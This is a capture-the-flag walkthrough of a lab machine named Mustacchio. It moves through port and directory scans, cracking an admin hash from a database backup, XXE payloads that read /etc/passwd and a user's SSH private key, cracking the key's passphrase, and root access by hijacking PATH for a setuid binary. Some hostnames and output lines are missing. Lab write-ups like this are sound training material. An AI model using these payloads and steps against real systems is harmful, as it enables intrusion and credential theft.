Date: 14, June, 2021
Author: Dhilip Sanjay S
$ nmap -sC -sV -p- -oN nmap.out
Starting Nmap 7.91 ( ) at 2021-06-14 14:57 IST
Nmap scan report for
Host is up (0.16s latency).
Not shown: 65532 filtered ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1269.52 seconds
$ gobuster dir -u -t 50 -w /usr/share/wordlists/dirb/common.txt | tee gobuster.out
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2021/06/14 15:02:30 Starting gobuster in directory enumeration mode
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/custom (Status: 301) [Size: 315] [-->]
/fonts (Status: 301) [Size: 314] [-->]
/images (Status: 301) [Size: 315] [-->]
/index.html (Status: 200) [Size: 1752]
/robots.txt (Status: 200) [Size: 28]
/server-status (Status: 403) [Size: 278]
2021/06/14 15:02:49 Finished
- It's an sqlite database backup
$ file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001
- Using sqlite, we can find the admin's password:
$ sqlite3 users.bak
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE users(username text NOT NULL, password text NOT NULL);
sqlite> .tables
sqlite> SELECT * FROM users;
- Use
to crack the admin's hash
$ john admin_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
- May be this is the password for the admin panel at Port 8765
- There was a backup file at
- Contents of that file:
$ cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
- Waste of time!!!
- The admin panel comment box was accepting only XML
- Try a basic
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
- The Output of the XXE:
- In the home page of the admin panel, there was a comment:
<!-- Barry, you can now SSH in using your key!-->
- So, try to read Barry's Private Key using XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
- And we get the Private key successfully.
- Save the
, change the permissions. - But we need the passphrase!
$ nano id_rsa_barry
$ chmod 600 id_rsa_barry
$ ssh -i id_rsa_barry [email protected]
Enter passphrase for key 'id_rsa_barry':
- Use john to find the passphrase:
$ locate ssh2john
$ /usr/share/john/
Usage: /usr/share/john/ <RSA/DSA/EC/OpenSSH private key file(s)>
$ john forjohn.txt --format="SSH" --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED (id_rsa_barry)
1g 0:00:00:07 68.71% (ETA: 16:14:08) 0.1420g/s 1399Kp/s 1399Kc/s 1399KC/s babaygirl75
1g 0:00:00:08 82.15% (ETA: 16:14:07) 0.1191g/s 1402Kp/s 1402Kc/s 1402KC/s 84059932
Session aborted
$ ssh -i id_rsa_barry [email protected]
Enter passphrase for key 'id_rsa_barry':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation:
* Management:
* Support:
34 packages can be updated.
16 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
barry@mustacchio:~$ whoami
barry@mustacchio:~$ ls
barry@mustacchio:~$ cat user.txt
barry@mustacchio:~$ find / -perm -u=s 2>/dev/null
barry@mustacchio:~$ cd /home/joe/
barry@mustacchio:/home/joe$ ls -la /lib64/
lrwxrwxrwx 1 root root 32 Jun 5 2020 /lib64/ -> /lib/x86_64-linux-gnu/
barry@mustacchio:/home/joe$ file live_log
live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not stripped
barry@mustacchio:/home/joe$ strings live_log
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
- The shared object can be used for Privilege escalation!
- But unfortunately,
was not installed on the machine. - The other binary being used here is
- Change the path variable.
barry@mustacchio:/home/joe$ echo $PATH
barry@mustacchio:/home/joe$ PATH=/home/barry:$PATH
barry@mustacchio:/home/joe$ echo $PATH
- Create a
executable in/home/barry
which opens/bin/bash
barry@mustacchio:/home/joe$ nano /home/barry/tail
barry@mustacchio:/home/joe$ cat /home/barry/tail
barry@mustacchio:/home/joe$ chmod +x /home/barry/tail
barry@mustacchio:/home/joe$ ls -l /home/barry/tail
-rwxrwxr-x 1 barry barry 10 Jun 14 11:15 /home/barry/tail
barry@mustacchio:/home/joe$ ./live_log
root@mustacchio:/home/joe# whoami
root@mustacchio:/home/joe# cd /root/
root@mustacchio:/root# ls
root@mustacchio:/root# cat root.txt